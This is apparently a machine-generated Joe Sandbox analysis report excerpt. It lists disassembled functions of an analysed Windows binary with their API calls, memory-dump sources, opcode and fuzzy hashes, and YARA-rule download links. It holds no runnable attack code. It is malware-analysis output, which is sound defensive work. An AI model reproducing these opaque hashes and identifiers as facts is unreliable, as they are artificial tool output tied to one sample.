                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 48725077ede48ddd8524ea1902ab79d0686450f7dc7be43bc0978a19a7615a12
                                                    • Instruction ID: ea0dab502850e367013735163c0d185625e80273abd4da7183fd8b75f30c0af7
                                                    • Opcode Fuzzy Hash: 48725077ede48ddd8524ea1902ab79d0686450f7dc7be43bc0978a19a7615a12
                                                    • Instruction Fuzzy Hash: 3C111C79901218FFDB11DF95CC85F9DBB75FB49710F204095E900B7290DA716E11DBA4
                                                    Function 00651290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 006512D8
                                                    • GetClientRect.USER32(?,?), ref: 0068B5FB
                                                    • GetCursorPos.USER32(?), ref: 0068B605
                                                    • ScreenToClient.USER32(?,?), ref: 0068B610
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: b702176744cee4a4e380e14092c60b823cfa3a86203441454d2df8cf52b2c3bf
                                                    • Instruction ID: 00405bd602cda7a68141e33f7165f06d90a63a6d64399a2cfcc40c56b134ca6c
                                                    • Opcode Fuzzy Hash: b702176744cee4a4e380e14092c60b823cfa3a86203441454d2df8cf52b2c3bf
                                                    • Instruction Fuzzy Hash: 18112B35901019FFCB00DFA8D885AFE77BAEB06301F404456F901E7240C730AB95CBAA
                                                    Function 006AD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006AD84D
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006AD864
                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006AD879
                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006AD897
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                    • String ID:
                                                    • API String ID: 1352324309-0
                                                    • Opcode ID: abdf643bcceddae2278d0aa674d16bf702455fab35cbb64c3285a2139054e393
                                                    • Instruction ID: 6a73bfa35a50038424b945838d4b92b688d5ceebd968e0799d0ac96ae46b27bc
                                                    • Opcode Fuzzy Hash: abdf643bcceddae2278d0aa674d16bf702455fab35cbb64c3285a2139054e393
                                                    • Instruction Fuzzy Hash: BA11A171A02304DBE3209F50DC08F97BBFDEB01B00F10856AE517C6891D7B8E9099FA1
                                                    Function 00686FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                    • String ID:
                                                    • API String ID: 3016257755-0
                                                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction ID: 435db66c2c6472413e49d5f9ed756bb0b5b87230d82229ead5371e30ee6abc33
                                                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                    • Instruction Fuzzy Hash: 27014CB244814EBBCF166F84CC41CEE3F63BB18355F688615FE1859131D236C9B1AB81
                                                    Function 006DB2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 006DB2E4
                                                    • ScreenToClient.USER32(?,?), ref: 006DB2FC
                                                    • ScreenToClient.USER32(?,?), ref: 006DB320
                                                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006DB33B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClientRectScreen$InvalidateWindow
                                                    • String ID:
                                                    • API String ID: 357397906-0
                                                    • Opcode ID: 22dd4180203abc6017a599394385c3db27124c49c081852419a3c916734dde69
                                                    • Instruction ID: 27f7197ef3fea4e12d5af714e544e27809f5a0894d389439838de831bca39e01
                                                    • Opcode Fuzzy Hash: 22dd4180203abc6017a599394385c3db27124c49c081852419a3c916734dde69
                                                    • Instruction Fuzzy Hash: 8C1143B9D00249EFDB41CFA9C8849EEBBB9FB08310F109166E915E3720D735AA559F50
                                                    Function 006B6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(?), ref: 006B6BE6
                                                      • Part of subcall function 006B76C4: _memset.LIBCMT ref: 006B76F9
                                                    • _memmove.LIBCMT ref: 006B6C09
                                                    • _memset.LIBCMT ref: 006B6C16
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 006B6C26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection_memset$EnterLeave_memmove
                                                    • String ID:
                                                    • API String ID: 48991266-0
                                                    • Opcode ID: 14707b00704398f4dc8148876045391ba0ac91f182b1b162ed486fa99fbe413d
                                                    • Instruction ID: 793826139f0973948485678f2c7d85301aed8f349ad34a9025758d93f3c351c9
                                                    • Opcode Fuzzy Hash: 14707b00704398f4dc8148876045391ba0ac91f182b1b162ed486fa99fbe413d
                                                    • Instruction Fuzzy Hash: DEF05E7A600100BBCF416F95DC85A8ABB2AEF45321F04C065FE099F227DB31E951CBB8
                                                    Function 00652218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00652231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 0065223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 00652250
                                                    • GetStockObject.GDI32(00000005), ref: 00652258
                                                    • GetWindowDC.USER32(?,00000000), ref: 0068BE83
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0068BE90
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0068BEA9
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0068BEC2
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0068BEE2
                                                    • ReleaseDC.USER32(?,00000000), ref: 0068BEED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: 65fa6a35ae7df839a73deaa68a61c10618bd2a7c5460177ae4469d7adaf8d92e
                                                    • Instruction ID: 0cacf318defbb3ca9dd49dffca884cfb9e69c84dff4a5d066eb3790375e327a4
                                                    • Opcode Fuzzy Hash: 65fa6a35ae7df839a73deaa68a61c10618bd2a7c5460177ae4469d7adaf8d92e
                                                    • Instruction Fuzzy Hash: 7EE06D32904244EADF215FA4FC0D7D83F12EB16332F049367FA6A480E187724A80DB12
                                                    Function 006A8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 006A871B
                                                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,006A82E6), ref: 006A8722
                                                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006A82E6), ref: 006A872F
                                                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,006A82E6), ref: 006A8736
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CurrentOpenProcessThreadToken
                                                    • String ID:
                                                    • API String ID: 3974789173-0
                                                    • Opcode ID: 48977ee24e0aa0abcb950b3206cef81fa57cf1b2f38535598b4e836bafc43513
                                                    • Instruction ID: 704c3c6c6ddcc0fe1ca5ee8d7f3aa38038161189fe63dc18f39595e3ffb27af5
                                                    • Opcode Fuzzy Hash: 48977ee24e0aa0abcb950b3206cef81fa57cf1b2f38535598b4e836bafc43513
                                                    • Instruction Fuzzy Hash: 3FE08636A122119FD7206FF05D0CF9A3BAEEF51791F158829B246CB040DA348841CB50
                                                    Function 00656240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %n
                                                    • API String ID: 0-2798127140
                                                    • Opcode ID: 3f3079128ef0a9ac03c8453b6f30077027a69abaa415d914acf7f269a1e9c11b
                                                    • Instruction ID: 8f2166cfbaeac666c364d9ad125e4ec9b4097ce360e1c0d4bcf9383a84e0298b
                                                    • Opcode Fuzzy Hash: 3f3079128ef0a9ac03c8453b6f30077027a69abaa415d914acf7f269a1e9c11b
                                                    • Instruction Fuzzy Hash: BAB1A2718001099BCF14EF94C8959FEB7B7EF48312F90412AFD52A7291DB349E8ACB95
                                                    Function 006CAEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __itow_s
                                                    • String ID: xbq$xbq
                                                    • API String ID: 3653519197-3323883282
                                                    • Opcode ID: 382ab5b9514f217f9c0aaad43ad53bd1a14ee68d8a4e4f8432c50ec5f1eed3d4
                                                    • Instruction ID: dab38f72d9dfa754fec3002d925b0bc6f5719c734dd2708321571af4842dad04
                                                    • Opcode Fuzzy Hash: 382ab5b9514f217f9c0aaad43ad53bd1a14ee68d8a4e4f8432c50ec5f1eed3d4
                                                    • Instruction Fuzzy Hash: 9AB15B70A00209AFCB14DF58C891EFABBBAFF58300F14815DF9459B291EB70E985CB64
                                                    Function 006BAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0066FC86: _wcscpy.LIBCMT ref: 0066FCA9
                                                      • Part of subcall function 00659837: __itow.LIBCMT ref: 00659862
                                                      • Part of subcall function 00659837: __swprintf.LIBCMT ref: 006598AC
                                                    • __wcsnicmp.LIBCMT ref: 006BB02D
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006BB0F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: f8e4fce916e9294226640773e78e594031bd1fe42407e72eb6f65dbab3cc3925
                                                    • Instruction ID: 11a1d78a8d9f3d63ab9c95b5df5c9bc20cc6560f26926b7a9b816be6cd909a64
                                                    • Opcode Fuzzy Hash: f8e4fce916e9294226640773e78e594031bd1fe42407e72eb6f65dbab3cc3925
                                                    • Instruction Fuzzy Hash: E96161B5A00215EFCB14EF98C891EEEB7B6EF08310F144169F916AB351D770AE85CB54
                                                    Function 00662957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 00662968
                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00662981
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: 5a1a675fb864ef9abad951d64e68ae2839599ac798ef317aaf3b6acabba1c442
                                                    • Instruction ID: 7e67e50fbbbaa7e2fb3c91b2f7c61c4db71aded928806624632d36f999bd4092
                                                    • Opcode Fuzzy Hash: 5a1a675fb864ef9abad951d64e68ae2839599ac798ef317aaf3b6acabba1c442
                                                    • Instruction Fuzzy Hash: 0B5154724087449BD360EF10D886BABBBE9FB85341F41895DF6D8410A1DF70852CCB6A
                                                    Function 006B9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00654F0B: __fread_nolock.LIBCMT ref: 00654F29
                                                    • _wcscmp.LIBCMT ref: 006B9824
                                                    • _wcscmp.LIBCMT ref: 006B9837
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: 0a19119a1fed1079bf444a1d72fd90c62c0e46b2d8455e2d03c49b563e6ae8b2
                                                    • Instruction ID: 5cac761f734bcfe490e5fbf2ed35f660e5282257fe318b07cca9db2f12446ef4
                                                    • Opcode Fuzzy Hash: 0a19119a1fed1079bf444a1d72fd90c62c0e46b2d8455e2d03c49b563e6ae8b2
                                                    • Instruction Fuzzy Hash: 5C41F971A00209BADF209FA4CC85FEFBBBEDF85714F00046DFA05A7281DA7199458B65
                                                    Function 00690574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID: Ddq$Ddq
                                                    • API String ID: 1473721057-78641243
                                                    • Opcode ID: a3822f194a97426978fe6a68592d022db5d295d78e30e4af01782664bbccbef9
                                                    • Instruction ID: 91dca9cefc2a7fb074d30001f7960b6ea4b00305d3c031fd1814540a78a4eba2
                                                    • Opcode Fuzzy Hash: a3822f194a97426978fe6a68592d022db5d295d78e30e4af01782664bbccbef9
                                                    • Instruction Fuzzy Hash: F65122786083418FDB60CF58C580A6ABBF2BB88355F54891CEC858B361D331EC89CF82
                                                    Function 006C258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 006C259E
                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006C25D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: CrackInternet_memset
                                                    • String ID: |
                                                    • API String ID: 1413715105-2343686810
                                                    • Opcode ID: 1cd57ad2e86fbbcc60311ef3f8a90119b56d056462c3efa2cac143998925a7ba
                                                    • Instruction ID: f1843b0e527a7a7bd8dfcaa425fe67457c835235b9305bc2cf1d127192cd8ad7
                                                    • Opcode Fuzzy Hash: 1cd57ad2e86fbbcc60311ef3f8a90119b56d056462c3efa2cac143998925a7ba
                                                    • Instruction Fuzzy Hash: 3B31397180011AABCF41EFA5DC95EEEBFBAFF08300F10005AFD15A6162DA315A16DB64
                                                    Function 006D6A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 006D6B17
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006D6B53
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: 893dc44a9a6d98c6662f42cf628992fcd771764703a35e43623bf5c875d2846f
                                                    • Instruction ID: ce9fe75af415744abe92918ec620bb2634f9237ff1e91ff02a21fdc1fd05ba3d
                                                    • Opcode Fuzzy Hash: 893dc44a9a6d98c6662f42cf628992fcd771764703a35e43623bf5c875d2846f
                                                    • Instruction Fuzzy Hash: A131AC71600204AEDB109F28CC80AFB77AAFF48760F10961AF9A5D7290DA31AC91CB64
                                                    Function 006A994C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 006A9965
                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 006A999F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: @U=u
                                                    • API String ID: 3850602802-2594219639
                                                    • Opcode ID: 010b8bdc97a31201b0698ce98d6657cdb177da1d11815b8c2eba93ba53a43854
                                                    • Instruction ID: 2343d02ce3600e2b8d1bae90849bb1cccb991bce43891a3e393e8385ec619d75
                                                    • Opcode Fuzzy Hash: 010b8bdc97a31201b0698ce98d6657cdb177da1d11815b8c2eba93ba53a43854
                                                    • Instruction Fuzzy Hash: F121C571D00205ABCB10BBA4D881DEEB77BEF89711F15406EFE15A7290EA709D458B70
